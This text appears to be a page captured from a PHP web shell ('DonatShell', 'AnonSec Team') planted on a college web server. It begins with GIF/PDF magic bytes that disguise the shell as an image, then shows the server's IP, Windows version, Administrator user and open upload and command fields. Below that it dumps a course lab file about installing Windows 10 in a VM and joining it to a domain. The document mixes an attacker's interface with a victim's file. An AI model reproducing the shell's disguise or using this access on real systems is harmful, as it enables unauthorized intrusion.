GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/CST2276/Labs/Lab02.3/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/CST2276/Labs/Lab02.3/Lab02.3.phpinc
<?
// JimMartinson/CST2276/Labs/Lab01/Lab01.phpinc

require('Gradebook/EvaluationSubmission_BEGIN.phpinc');
#if ( $_SESSION['userId'] != 1 ) { require('Gradebook/EvaluationSubmission_NOTAVAILABLE.phpinc'); exit; }

#$showGenerateComputerNamesVariables = true;
require('JimMartinson/CST2276/Labs/GenerateComputerNames.phpinc');

$disabled = '';
//$disabled = ' disabled';

$uploadFilename = $courseNumber.'_'.$evaluationName.'_'.$userFileName.'.png';

?>
<style type="text/css">b {white-space:nowrap;}</style>
<p>
<fieldset><legend><?=$evaluationType?> <?=$evaluationNumber?> Assignment</legend>
<? if ( $disabled ) { ?>
<span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><br>
<? } ?>
The purpose of this lab is to install Windows 10 Desktop in a VM.
<br><?=$gradeNote?>
	<br>
	<span class="attention">Attention:</span>
	<b>Before performing this lab you need to add a second network adapter to the server VM that is attached to the Host-only Adapter.</b>
	You can <a href="https://minnstate.zoom.us/rec/share/CPO_kENFHLzuC-06G4_ecvgCy5ugzoNkEcBkhcApeXlEiImGmWt4j0wHgiWuffsO.uTaDdFNry43tCsQF?startTime=1674681871000">view a recording</a> that shows how to do this.
	<br>
	<br>
<ol>
	<li>Create a directory called <b class="copyText"><?=$evaluationName?></b>. We will use it for all work performed in this lab.</li>
	<li>Install Windows 10 Desktop in a VM.
		<ul>
			<li><a href="https://cst.ridgewater.edu/JimMartinson/CST2276/Resources/Windows10.iso">Download the Windows 10 iso file </a> (Windows10.iso ).</li>
			<li>Use Virtualbox to create a VM and install Windows 10 Desktop.</li>
		</ul>
	</li>
	<li>Add a second network adapter to the VM that is attached to the <b>Host-only Adapter</b>.</li>
	<li>Change the DNS on the Host-only Adapter so that it uses the ip address of your server. <span class="note">Both your server and desktop VMs must be connected to the Host-only Adapter and you must use the server IP address from it's Host-only Adapter.</span></li>
	<li>Change the name of the computer to <b class="copyText"><?=$workstationName?></b>.</li>
	<li>Add the computer to your <b class="copyText"><?=$domainName?></b> domain. <span class="note">Your server need to be running.</span></li>
	<li>Show that the computer has been added to your <?=$domainName?> domain.
		<br><b>On your server:</b>
		<ol>
			<li>Open <b>Server Manager / Active Directory Users and Computers / Computers</b>. This will show the computers that are in your domain.</li>
			<li>Take a screenshot and save it as <b class="copyText"><?=$uploadFilename?></b> in your <b><?=$evaluationName?></b> folder.
		<? showBegin('See System example screenshot'); ?><br>
		<img src="win10.png" width="786" alt="System example"/>
		<? showEnd (); ?>
			</li>
		</ol>
	</li>
	<li>Turn in your assignment:
		<ol type="a">
			<li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload" id="inpFileUpload"<?=$disabled?>><div id="divFileploadError"></div></li>
			<li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"<?=$disabled?>> for grading.<? if ( $disabled ) { ?> <span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?></li>
		</ol>
	</li>
</ol>
<?=$gradeNote?>
</fieldset>
<?
require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced.
if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n";
?>

Anon7 - 2022
AnonSec Team